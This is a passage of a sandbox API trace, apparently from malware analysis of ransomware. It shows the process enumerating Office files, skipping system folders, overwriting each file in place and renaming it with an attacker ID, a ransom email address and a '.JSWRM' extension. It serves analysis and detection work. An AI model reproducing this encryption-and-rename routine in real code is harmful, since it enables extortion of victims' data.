lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0116.679] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME01.CSS", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME01.CSS", lpUsedDefaultChar=0x0) returned 12 [0116.679] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0116.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0116.679] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME01.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0116.679] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME01.CSS", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME01.CSS", lpUsedDefaultChar=0x0) returned 12 [0116.679] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0116.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0116.679] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0116.679] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0116.679] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0116.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0116.680] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME01.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme01.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0116.680] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=126630) returned 1 [0116.680] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1eea0) returned 0x24c1d0 [0116.681] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1eea0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0x1eea0, lpOverlapped=0x0) returned 1 [0116.690] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.690] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1eea0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0x1eea0, lpOverlapped=0x0) returned 1 [0116.691] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0116.691] CloseHandle (hObject=0x314) returned 1 [0116.691] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0116.691] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0116.691] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0116.691] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0116.691] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0116.691] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0116.691] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0116.691] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0116.691] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0116.691] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0116.691] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0116.691] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0116.691] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0116.691] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0116.691] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME01.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme01.css"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME01.CSS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme01.css.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0116.692] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0116.692] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0116.692] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0116.692] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xa49a612, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xa49a612, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xa49a612, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1fbbe, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="SCHEME02.CSS", cAlternateFileName="")) returned 1 [0116.692] lstrcmpiW (lpString1="SCHEME02.CSS", lpString2=".") returned 1 [0116.692] lstrcmpiW (lpString1="SCHEME02.CSS", lpString2="..") returned 1 [0116.692] lstrcmpiW (lpString1="SCHEME02.CSS", lpString2="...") returned 1 [0116.692] lstrcmpiW (lpString1="SCHEME02.CSS", lpString2="windows") returned -1 [0116.692] lstrcmpiW (lpString1="SCHEME02.CSS", lpString2="recovery") returned 1 [0116.692] lstrcmpiW (lpString1="SCHEME02.CSS", lpString2="perflogs") returned 1 [0116.692] lstrcmpiW (lpString1="SCHEME02.CSS", lpString2="documents and settings") returned 1 [0116.693] lstrcmpiW (lpString1="SCHEME02.CSS", lpString2="$RECYCLE.BIN") returned 1 [0116.693] lstrcmpiW (lpString1="SCHEME02.CSS", lpString2="system volume information") returned -1 [0116.693] lstrcmpiW (lpString1="SCHEME02.CSS", lpString2="msocache") returned 1 [0116.693] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0116.693] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME02.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0116.693] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME02.CSS", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME02.CSS", lpUsedDefaultChar=0x0) returned 12 [0116.693] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0116.693] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0116.693] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME02.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0116.693] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME02.CSS", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME02.CSS", lpUsedDefaultChar=0x0) returned 12 [0116.693] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0116.693] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0116.693] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0116.693] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0116.693] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0116.693] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0116.693] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME02.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme02.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0116.697] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=129982) returned 1 [0116.697] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.697] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1fbb0) returned 0x24c1d0 [0116.697] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1fbb0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0x1fbb0, lpOverlapped=0x0) returned 1 [0116.709] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.709] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1fbb0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0x1fbb0, lpOverlapped=0x0) returned 1 [0116.709] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0116.709] CloseHandle (hObject=0x314) returned 1 [0116.709] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0116.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0116.709] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0116.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0116.710] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0116.710] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0116.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0116.710] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0116.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0116.710] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0116.710] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0116.710] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0116.710] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0116.710] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0116.710] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME02.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme02.css"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME02.CSS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme02.css.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0116.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0116.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0116.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0116.711] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xa49a612, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xa49a612, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xa49a612, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1f024, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="SCHEME03.CSS", cAlternateFileName="")) returned 1 [0116.711] lstrcmpiW (lpString1="SCHEME03.CSS", lpString2=".") returned 1 [0116.711] lstrcmpiW (lpString1="SCHEME03.CSS", lpString2="..") returned 1 [0116.711] lstrcmpiW (lpString1="SCHEME03.CSS", lpString2="...") returned 1 [0116.711] lstrcmpiW (lpString1="SCHEME03.CSS", lpString2="windows") returned -1 [0116.711] lstrcmpiW (lpString1="SCHEME03.CSS", lpString2="recovery") returned 1 [0116.711] lstrcmpiW (lpString1="SCHEME03.CSS", lpString2="perflogs") returned 1 [0116.711] lstrcmpiW (lpString1="SCHEME03.CSS", lpString2="documents and settings") returned 1 [0116.711] lstrcmpiW (lpString1="SCHEME03.CSS", lpString2="$RECYCLE.BIN") returned 1 [0116.711] lstrcmpiW (lpString1="SCHEME03.CSS", lpString2="system volume information") returned -1 [0116.711] lstrcmpiW (lpString1="SCHEME03.CSS", lpString2="msocache") returned 1 [0116.711] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0116.712] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME03.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0116.712] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME03.CSS", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME03.CSS", lpUsedDefaultChar=0x0) returned 12 [0116.712] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0116.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0116.712] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME03.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0116.712] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME03.CSS", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME03.CSS", lpUsedDefaultChar=0x0) returned 12 [0116.712] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0116.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0116.712] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0116.712] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0116.712] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0116.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0116.712] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME03.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme03.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0116.713] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=127012) returned 1 [0116.713] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.713] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1f020) returned 0x24c1d0 [0116.713] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1f020, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0x1f020, lpOverlapped=0x0) returned 1 [0116.723] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.723] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1f020, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0x1f020, lpOverlapped=0x0) returned 1 [0116.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0116.723] CloseHandle (hObject=0x314) returned 1 [0116.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0116.723] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0116.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0116.723] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0116.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0116.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0116.723] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0116.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0116.723] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0116.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0116.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0116.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0116.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0116.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0116.724] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME03.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme03.css"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME03.CSS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme03.css.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0116.726] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0116.726] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0116.726] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0116.726] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xa49a612, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xa49a612, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xa49a612, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1f4e2, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="SCHEME04.CSS", cAlternateFileName="")) returned 1 [0116.726] lstrcmpiW (lpString1="SCHEME04.CSS", lpString2=".") returned 1 [0116.726] lstrcmpiW (lpString1="SCHEME04.CSS", lpString2="..") returned 1 [0116.726] lstrcmpiW (lpString1="SCHEME04.CSS", lpString2="...") returned 1 [0116.726] lstrcmpiW (lpString1="SCHEME04.CSS", lpString2="windows") returned -1 [0116.726] lstrcmpiW (lpString1="SCHEME04.CSS", lpString2="recovery") returned 1 [0116.726] lstrcmpiW (lpString1="SCHEME04.CSS", lpString2="perflogs") returned 1 [0116.726] lstrcmpiW (lpString1="SCHEME04.CSS", lpString2="documents and settings") returned 1 [0116.726] lstrcmpiW (lpString1="SCHEME04.CSS", lpString2="$RECYCLE.BIN") returned 1 [0116.726] lstrcmpiW (lpString1="SCHEME04.CSS", lpString2="system volume information") returned -1 [0116.727] lstrcmpiW (lpString1="SCHEME04.CSS", lpString2="msocache") returned 1 [0116.727] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0116.727] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME04.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0116.727] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME04.CSS", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME04.CSS", lpUsedDefaultChar=0x0) returned 12 [0116.727] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0116.727] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0116.727] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME04.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0116.727] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME04.CSS", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME04.CSS", lpUsedDefaultChar=0x0) returned 12 [0116.727] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0116.727] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0116.727] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0116.727] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 